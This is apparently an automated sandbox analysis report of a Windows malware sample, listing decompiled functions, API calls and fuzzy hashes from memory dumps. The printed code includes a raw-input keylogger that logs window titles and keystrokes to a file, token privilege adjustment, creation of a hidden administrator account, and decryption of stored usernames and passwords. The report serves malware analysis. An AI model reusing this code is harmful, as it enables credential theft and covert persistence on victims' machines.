0x0040f591
0x0040f593
0x0040f596
0x0040f59c
0x0040f5a4
0x0040f5ca
0x0040f5f1
0x0040f5f1
0x0040f5fa
0x0040f5ff
0x0040f5ff
0x0040f60e
0x0040f618

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D471,?,?,00000001), ref: 0040F5C2
LookupAccountSidW.ADVAPI32(00000000,0040D471,?,00000104,?,00000010,?), ref: 0040F5E7
GetLastError.KERNEL32(?,?,00000001), ref: 0040F5F1
FreeSid.ADVAPI32(0040D471,?,?,00000001), ref: 0040F5FF

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AccountAllocateErrorFreeInitializeLastLookup
String ID:
API String ID: 1866703397-0
Opcode ID: b0011a36a233918660f51aaeda3ff38362614afdb50e87bc64376f1b46c92c9b
Instruction ID: 3b598cacf1515ca3802b60831c59e6c5522185c78844e00366c38059d8a2d7b5
Opcode Fuzzy Hash: b0011a36a233918660f51aaeda3ff38362614afdb50e87bc64376f1b46c92c9b
Instruction Fuzzy Hash: 4C11E9B190020DBADB10DFD1DC89AEFBBBCEB08745F104476E605E2191E7749A489BA5

Uniqueness

Uniqueness Score: -1.00%

Function 046A5B40, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 369COMMON

Download Yara Rule

Strings

database corruption at line %d of [%.10s], xrefs: 046A5E4F, 046A5F23
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A5E45, 046A5F19

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 0-1231421067
Opcode ID: fd9d36ee6d048db83ebf418868d4dada39335563b88f3e720afaa0935c581e91
Instruction ID: d7b720e35c30e736f016e89b1b8d724b4e528d274557f9aa39765d4aab8d7eb5
Opcode Fuzzy Hash: fd9d36ee6d048db83ebf418868d4dada39335563b88f3e720afaa0935c581e91
Instruction Fuzzy Hash: 18C10271704A11ABDB24DF18D880A6AB3E5FB94324F14896EE94A8B341F771FC218F81

Uniqueness

Uniqueness Score: -1.00%

Function 0469BCD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0469BD48
_memset.LIBCMT ref: 0469BEA4

Strings

0, xrefs: 0469BD1C

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_memset
String ID: 0
API String ID: 121741435-4108050209
Opcode ID: 89d020265cfa43ce61ab516029ab5aa60690af1eb6e25016184cb03a4c87677f
Instruction ID: ac3afb1efb8a1bad9b5e467db41ab5ae790e1446a577442496d7659be1a38a23
Opcode Fuzzy Hash: 89d020265cfa43ce61ab516029ab5aa60690af1eb6e25016184cb03a4c87677f
Instruction Fuzzy Hash: 2E715AB0A00A42EFDB14CF69D484AAABBF5BF94200F14866ED54687B41E770F954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040B15E, Relevance: 4.6, APIs: 3, Instructions: 61
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040B15E(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
				int _v8;
				DWORD* _v12;
				DWORD* _v16;
				void* _v20;
				int _v24;
				BYTE* _v28;
				char _v32;
				char _v8128;
				int _t27;
				CHAR* _t39;
				void* _t43;

				_t43 = __ecx;
				E00401190(0x1fbc, __ecx);
				_v8 = 0x1fa0;
				_t27 = lstrlenA(_a4);
				E00401052( &_v8128, 0, 0x1fa0);
				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);
				_v32 = 0;
				_v28 =  &_v8128;
				_v24 = _v8;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				 *((intOrPtr*)(_t43 + 0x70))( &_v32,  &_v20, 0);
				 *((char*)(_v12 + _v16)) = 0;
				_t39 = E00405EB4(_v12 + 1);
				 *_a8 = _t39;
				return lstrcpyA(_t39, _v16);
			}

0x0040b15e
0x0040b166
0x0040b178
0x0040b17b
0x0040b18e
0x0040b1a9
0x0040b1b5
0x0040b1b8
0x0040b1be
0x0040b1c9
0x0040b1cd
0x0040b1d0
0x0040b1d3
0x0040b1df
0x0040b1e8
0x0040b1f4
0x0040b200

APIs

lstrlenA.KERNEL32(?,?,?,00000000,?,0040AA4B,00000000,0000000A,encryptedPassword,?,encryptedUsername,?,hostname,?,00000000,encryptedUsername), ref: 0040B17B
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040B1A9

Part of subcall function 00405EB4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403652,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,74B60770,00000000), ref: 00405EBE

lstrcpyA.KERNEL32(00000000,?), ref: 0040B1F6

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
String ID:
API String ID: 573875632-0
Opcode ID: 237850a45561d8afdd84ed52f6ea1cc7b30d16a63204f57b6bc7a383c55df0d8
Instruction ID: 1e628b6e4e0e23564231c11d106335a829b2c53438db6e7f5bd85d2f6d685f2b
Opcode Fuzzy Hash: 237850a45561d8afdd84ed52f6ea1cc7b30d16a63204f57b6bc7a383c55df0d8
Instruction Fuzzy Hash: E211D6B6D00209AFDB01DF95D8848EFBBBCEB48344F1080BAF505A7251D7359A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040F619, Relevance: 4.6, APIs: 3, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040F619(void* __ecx, WCHAR** __edx) {
				void* _v8;
				long _v12;
				struct _LUID _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				struct _TOKEN_PRIVILEGES _v36;
				struct _TOKEN_PRIVILEGES _v52;
				WCHAR** _t33;

				asm("stosd");
				asm("xorps xmm0, xmm0");
				_v8 = 0;
				_t33 = __edx;
				asm("movlpd [ebp-0x10], xmm0");
				_v12 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(OpenProcessToken(__ecx, 0x28,  &_v8) == 0 || LookupPrivilegeValueW(0,  *_t33,  &_v20) == 0) {
					L4:
					return 0;
				} else {
					_v36.Privileges = _v20.LowPart;
					_v28 = _v20.HighPart;
					_v36.PrivilegeCount = 1;
					_v24 = 2;
					if(AdjustTokenPrivileges(_v8, 0,  &_v36, 0x10,  &_v52,  &_v12) == 0) {
						goto L4;
					}
					return 1;
				}
			}

0x0040f627
0x0040f62a
0x0040f62d
0x0040f630
0x0040f632
0x0040f637
0x0040f63a
0x0040f63b
0x0040f63c
0x0040f64c
0x0040f698
0x00000000
0x0040f65f
0x0040f665
0x0040f66e
0x0040f678
0x0040f683
0x0040f692
0x00000000
0x00000000
0x00000000
0x0040f694

APIs

OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,0040E18E), ref: 0040F644
LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0040F655
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 0040F68A

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
String ID:
API String ID: 658607936-0
Opcode ID: c6676e19c9dce9a8bc6835bcfd14c0ec21f64ff11388038882d9bdd43d36353e
Instruction ID: 8332c94ce834d9b4f7767c05631ca274011cc841fa13cb12cd9f11b9cc91c3c6
Opcode Fuzzy Hash: c6676e19c9dce9a8bc6835bcfd14c0ec21f64ff11388038882d9bdd43d36353e
Instruction Fuzzy Hash: F6110A75A10219AFEB20CFE5CC849EFFBBCFB48700F10493AA501F2150E7749A058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040D418, Relevance: 3.1, APIs: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040D418(char _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				void _v36;
				void* _t22;
				intOrPtr* _t25;
				signed int _t30;
				intOrPtr* _t38;

				_t38 = _a4;
				_t30 = 8;
				memset( &_v36, 0, _t30 << 2);
				_v36 =  *_t38;
				_v24 = 1;
				_v20 = 0;
				_v32 =  *_a8;
				_t22 =  &_v36;
				_v16 = 0;
				_v12 = 0x10201;
				_v8 = 0;
				__imp__NetUserAdd(0, 1, _t22, 0);
				_t42 = _t22;
				if(_t22 != 0) {
					L3:
					__eflags = 0;
					return 0;
				}
				_a4 =  *_t38;
				_t25 = E0040F56D( &_a8, _t42);
				__imp__NetLocalGroupAddMembers(0,  *_t25, 3,  &_a4, 1);
				L00405EA5(_a8);
				if(_t25 != 0) {
					goto L3;
				}
				return 1;
			}

0x0040d420
0x0040d428
0x0040d42e
0x0040d434
0x0040d43c
0x0040d43f
0x0040d444
0x0040d447
0x0040d44d
0x0040d450
0x0040d457
0x0040d45a
0x0040d460
0x0040d462
0x0040d493
0x0040d493
0x00000000
0x0040d493
0x0040d469
0x0040d46c
0x0040d47b
0x0040d486
0x0040d48d
0x00000000
0x00000000
0x00000000

APIs

NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,0054E080,?,?,?,0040E634,0054E07C,0054E080), ref: 0040D45A

Part of subcall function 0040F56D: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D471,?,?,00000001), ref: 0040F5C2
Part of subcall function 0040F56D: LookupAccountSidW.ADVAPI32(00000000,0040D471,?,00000104,?,00000010,?), ref: 0040F5E7
Part of subcall function 0040F56D: GetLastError.KERNEL32(?,?,00000001), ref: 0040F5F1
Part of subcall function 0040F56D: FreeSid.ADVAPI32(0040D471,?,?,00000001), ref: 0040F5FF

NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0040E634,0054E07C,0054E080), ref: 0040D47B

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
String ID:
API String ID: 188019324-0
Opcode ID: 597690d96667462ad59adff689e7d2223bd5119e156d35c2d7ab40080fe41be3
Instruction ID: 35dae00ccef6b446e0c841155e11f4e793a47711b1090637ee54e787cfdbff70
Opcode Fuzzy Hash: 597690d96667462ad59adff689e7d2223bd5119e156d35c2d7ab40080fe41be3
Instruction Fuzzy Hash: 10110072900208AFDB11DFAAD8849EEF7F8EF59354B10443AF951E7250D7B4AA448B50

Uniqueness

Uniqueness Score: -1.00%

Function 046B3030, Relevance: 1.6, APIs: 1, Instructions: 127COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046B30A4

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 18e72f5a26293e43736e9ea2743eb2cb9554413542e559d46115411bbdfc83ef
Instruction ID: db18bfde0ab5c479446d16a417b0aada1655b72b25a0525694161bc333e7c8ef
Opcode Fuzzy Hash: 18e72f5a26293e43736e9ea2743eb2cb9554413542e559d46115411bbdfc83ef
Instruction Fuzzy Hash: 45419CB06047119BD714CF18C8C06AABBA8BF88B04F04491EED869B346E775F9D5CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 046B4D50, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94165ce5e3845f687cb31bf618342abef4d18656edf26f48880d082d3840404a
Instruction ID: 39ff9aef47c6d2d172cff69b5d8455fc5fa305d45eb7af181ca5d83fdd5efa4b
Opcode Fuzzy Hash: 94165ce5e3845f687cb31bf618342abef4d18656edf26f48880d082d3840404a
Instruction Fuzzy Hash: 9941C876700204AFD710DF59EC80AA6B7A4EF84325F144699FE588B352EA31FD51C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00419172, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
Instruction ID: 32b45bac7427164607efcda96c7a1d2a37098db285ec3ad8997b80a647b6199f
Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
Instruction Fuzzy Hash: B0313075E0061AAFDB14CF98C8E09AEB7F5FF89314B1981AAD401A7711D774EE81CB84

Uniqueness

Uniqueness Score: -1.00%

Function 046B4EE0, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4e18b2a86c15a400c1d0089d617af6e70438e98beaef1da7b5d08dbe991bec4
Instruction ID: 41bfec109dd5397cc1f25ff9631eddbfe0a402c8863118a02790a440699b1382
Opcode Fuzzy Hash: b4e18b2a86c15a400c1d0089d617af6e70438e98beaef1da7b5d08dbe991bec4
Instruction Fuzzy Hash: B91182B0604602EFD704CF18D8808AAB7E8FF88314B14462DE958C7B41EB71F9A1CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 046B4C40, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13c445929ca286d4c3a958b029a14ecdccc6c499f0ea85c763cda0b1020ec1fb
Instruction ID: 852dafaea80767c6b82b91452ea4685950cfe58adfb05a779ec11c4a8f79b765
Opcode Fuzzy Hash: 13c445929ca286d4c3a958b029a14ecdccc6c499f0ea85c763cda0b1020ec1fb
Instruction Fuzzy Hash: 9211ADB0600606AFDB04DF1CE8808A6B3E8FF88318B144229E948C7700EB71F961CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 046B4BC0, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17f9101ead644c497935baf6e69f98f6a457193506094c7d4e24f841c65ea0c9
Instruction ID: 897e264b7f2a4f35749b109bfbd048c8b199354f2e1c18513df40cff8bcce14d
Opcode Fuzzy Hash: 17f9101ead644c497935baf6e69f98f6a457193506094c7d4e24f841c65ea0c9
Instruction Fuzzy Hash: 7CF062716005159BCB00EE2DEC84496B7A8EF44215F040665ED94C7316FF31F965CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 046B50E0, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 335bd9add436b5b890f15a3108ebaa61b4ea49c47f65e77cb493bc5058e516ce
Instruction ID: dd777e41118eed627245c5e7fcbeb912a7daa72925cbb8afd67b13e880bf9586
Opcode Fuzzy Hash: 335bd9add436b5b890f15a3108ebaa61b4ea49c47f65e77cb493bc5058e516ce
Instruction Fuzzy Hash: 83E022B26002083FFB154E78AC90BD63788970C22CF080229F84EC7341F426F4C087C0

Uniqueness

Uniqueness Score: -1.00%

Function 046B52D0, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe949f4db79c0fb07479b10b96d6eb37ab230a312b52561a4276eabf098e6e51
Instruction ID: c101395f4c2e401216269642686b8ae87c8c5b6da0b3ab9c9a03a567e2cae630
Opcode Fuzzy Hash: fe949f4db79c0fb07479b10b96d6eb37ab230a312b52561a4276eabf098e6e51
Instruction Fuzzy Hash: 0FF03070016384FFE7279B28D459BE43B985B2530CF8844D9D88A0F362E2B7E4CAC391

Uniqueness

Uniqueness Score: -1.00%

Function 046B4FF0, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a890737bfd37e83267eeeb0658fabb3551758157130f918969f7a3acfa2a2ea2
Instruction ID: f3a3800234231c2779fd2c9162f075d117a8f77c4e2b46ac1edafdf6ab823472
Opcode Fuzzy Hash: a890737bfd37e83267eeeb0658fabb3551758157130f918969f7a3acfa2a2ea2
Instruction Fuzzy Hash: D7E08633311934AB47109D9EE4404DEB399FAC467D3090026FA4AC7600E732FC8153D5

Uniqueness

Uniqueness Score: -1.00%

Function 046B4CC0, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e37c7c935b14d4e4c7033b2c52bf4c876b532950a5f4a43227f3c8b0b859baf3
Instruction ID: 428479c882c1607d7aa5863014f0d5716f1000e90990594598fc20483a125a34
Opcode Fuzzy Hash: e37c7c935b14d4e4c7033b2c52bf4c876b532950a5f4a43227f3c8b0b859baf3
Instruction Fuzzy Hash: A2E0127A3502059B9B12EE5DE8818E633ACEF885617154025FA99C7301FF31F84587E5

Uniqueness

Uniqueness Score: -1.00%

Function 00410620, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
Instruction ID: 451d43169ccbb2215ef147c0df9262fe2611908ea92783b9fe1fda873cbde726
Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
Instruction Fuzzy Hash: 42E08C32200510CBC720DB1AD840993B3B4EBC0370B2A046AE48AE7601C3A8FCE2CA94

Uniqueness

Uniqueness Score: -1.00%

Function 046B4CF0, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9061127f8f84489ae12ac5f7fb4400e51eb8437db0284a13a9696f7abbe481b9
Instruction ID: 765be8be51d683d1985bd56bc89259688a5473bbffada631991a8108990bebec
Opcode Fuzzy Hash: 9061127f8f84489ae12ac5f7fb4400e51eb8437db0284a13a9696f7abbe481b9
Instruction Fuzzy Hash: 85D09EBA6142096BEB00DE48ECC1DAB73ADAB4C614F404504BE1857341D571F96087B5

Uniqueness

Uniqueness Score: -1.00%

Function 046B4D20, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a6df418152a03dd52473d9eed5b963773734f5fdfe09b25e6c6c2140b9cea4
Instruction ID: bbaad7426488a03ed6617c989c48c1b99770a79a474d4461b93bcdd9b9167fe0
Opcode Fuzzy Hash: c5a6df418152a03dd52473d9eed5b963773734f5fdfe09b25e6c6c2140b9cea4
Instruction Fuzzy Hash: 2AD09EBA6042096BEB00DE48ECC2DAB73ACAB4C614F408504BE1857342D571FD6087B5

Uniqueness

Uniqueness Score: -1.00%

Function 046B4B90, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 221c8917cc634ef3a2dbea97f878f095456748329b0bb4858dca2e0b7b0aed3e
Instruction ID: cdf8921a9355ba83c600d1419d2e8a2afc7f39c7b9347e9dbb2c5b692c01d643
Opcode Fuzzy Hash: 221c8917cc634ef3a2dbea97f878f095456748329b0bb4858dca2e0b7b0aed3e
Instruction Fuzzy Hash: 0DD09EBA6042096BEB00DE48ECC1EAB73ACAB4C614F504504BE1857341D571F96087B5

Uniqueness

Uniqueness Score: -1.00%

Function 046B4C20, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1f1daf6b4b04424e48a67e25c879642ab23ced374421459458b6fbd06bd0bad
Instruction ID: 54b2215d51868ad72a7a370d47414af95f053a67e4a7c65dff2ca8029f9f6678
Opcode Fuzzy Hash: c1f1daf6b4b04424e48a67e25c879642ab23ced374421459458b6fbd06bd0bad
Instruction Fuzzy Hash: D4D0C9E65106086B9754EE5C9C45CBA335DD645564B404748BD6887281EA31EA2087E5

Uniqueness

Uniqueness Score: -1.00%

Function 046B4F70, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458186326f1e19d1f857594071c0f5f09dffa51a2e27790996bdfb7284bd579b
Instruction ID: ccdd741d95c789ea813ce5a6011f867f50f380a1710b733352dfaca105316004
Opcode Fuzzy Hash: 458186326f1e19d1f857594071c0f5f09dffa51a2e27790996bdfb7284bd579b
Instruction Fuzzy Hash: 2FC09B3125460C8A5B008DD5B44097733DC9744D547490091F80CCB501F625F890D1D0

Uniqueness

Uniqueness Score: -1.00%

Function 0041094E, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
Instruction ID: c7ffb21236a01e711484f890f9ab4a733e178a674d023b35b9ed1a8d03666c8f
Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
Instruction Fuzzy Hash: 9FD0EA783619408FDB51CF18C694E02B3E4EB49B60B098491E909CB736D738ED40EA40

Uniqueness

Uniqueness Score: -1.00%

Function 00410619, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040902E, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 277
registrystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040902E(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v524;
				short _v564;
				intOrPtr _v568;
				short _v570;
				short _v572;
				long _v596;
				char _v600;
				int _v604;
				char _v612;
				intOrPtr _v616;
				struct _OVERLAPPED* _v620;
				char _v624;
				char _v628;
				void* _v632;
				char _v636;
				intOrPtr _v640;
				struct _OVERLAPPED* _v644;
				char _v648;
				void* _t76;
				short _t77;
				void* _t82;
				char* _t84;
				struct _OVERLAPPED** _t86;
				long _t88;
				intOrPtr _t93;
				intOrPtr* _t96;
				long _t100;
				intOrPtr _t101;
				WCHAR* _t102;
				intOrPtr _t104;
				void* _t105;
				long _t109;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				long _t116;
				intOrPtr _t117;
				intOrPtr _t119;
				long _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				void* _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				long _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				DWORD* _t136;
				long _t137;
				intOrPtr _t138;
				long _t142;
				void* _t152;
				long _t164;
				intOrPtr _t178;
				intOrPtr _t189;
				void* _t195;
				struct _OVERLAPPED* _t198;
				struct _OVERLAPPED* _t201;
				void* _t204;
				void* _t206;
				void* _t208;
				signed int _t209;
				void* _t212;
				void* _t213;

				_t198 = 0;
				_v600 = 0;
				E00401052( &_v524, 0, 0x208);
				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
				_t201 = 0;
				_v604 = 0;
				_t76 = _a8 - 1;
				if(_t76 == 0) {
					_t77 = 6;
					_v570 = _t77;
					__eflags = 1;
					_v564 = _a4;
					_v568 = 0x130;
					_v572 = 1;
					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
				} else {
					_t82 = _t76 - 0xf;
					if(_t82 == 0) {
						PostQuitMessage(0);
					} else {
						if(_t82 == 0xef) {
							_t84 =  &_v600;
							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
							__eflags = _t84 - 0xffffffff;
							if(_t84 != 0xffffffff) {
								_t164 = E00405F53(_v620);
								_v596 = _t164;
								__eflags = _t164;
								if(_t164 != 0) {
									_t86 =  &_v620;
									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
									__eflags = _t86 - _v640;
									if(_t86 == _v640) {
										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
											__eflags = _t88;
											if(_t88 <= 0) {
												E004032FF( &_v644, _t195, L"Unknow");
											} else {
												E00403437( &_v648, E004035E5( &_v636,  &_v564));
												L00405EA5(_v644);
											}
											E004094AE( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
											E00403437( &_v632,  &_v644);
											_t93 =  *0x4196a0; // 0x0
											E0040346A( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
											_t96 =  *0x4196a0; // 0x0
											__eflags =  *_t96 - _t198;
											if( *_t96 != _t198) {
												_t213 = _t212 - 0x10;
												__eflags = _t96 + 0xa18;
												E00401361(_t213, _t96 + 0xa18, _t96 + 0xa18);
												_t208 = _t213 - 0x10;
												E0040362D(_t208,  &_v636);
												 *((intOrPtr*)(_t208 + 4)) = _v636;
												 *((short*)(_t208 + 8)) = _v632;
												E0040362D(_t208 + 0xc,  &_v628);
												_t152 = E004049AB( &_v612, __eflags);
												_t189 =  *0x4196a0; // 0x0
												E00404F2B( *((intOrPtr*)(_t189 + 0xa50)), _t152);
												E00404981( &_v648);
												_t96 =  *0x4196a0; // 0x0
											}
											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
												_t100 = lstrlenW(_t96 + 0x210);
												__eflags = _t100;
												_t101 =  *0x4196a0; // 0x0
												if(_t100 == 0) {
													L17:
													_t102 = _t101 + 0x210;
													__eflags = _t102;
													lstrcpyW(_t102, _v632);
													_t104 =  *0x4196a0; // 0x0
													 *(_t104 + 0xa10) = _t198;
												} else {
													_t142 = E00403248( &_v648, E004035E5( &_v636, _t101 + 0x210));
													L00405EA5(_v644);
													_t101 =  *0x4196a0; // 0x0
													_v644 = _t198;
													__eflags = _t142;
													if(_t142 == 0) {
														goto L17;
													} else {
														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
													}
												}
												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
												_t178 =  *0x4196a0; // 0x0
												 *(_t178 + 4) = _t105;
												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
												if(__eflags == 0) {
													_t49 = _t178 + 8; // 0x8
													_t204 = L"\r\n";
													_t116 = lstrlenW(_t204);
													_t117 =  *0x4196a0; // 0x0
													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
													_t119 =  *0x4196a0; // 0x0
													_t121 = lstrlenW(_t204);
													_t122 =  *0x4196a0; // 0x0
													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
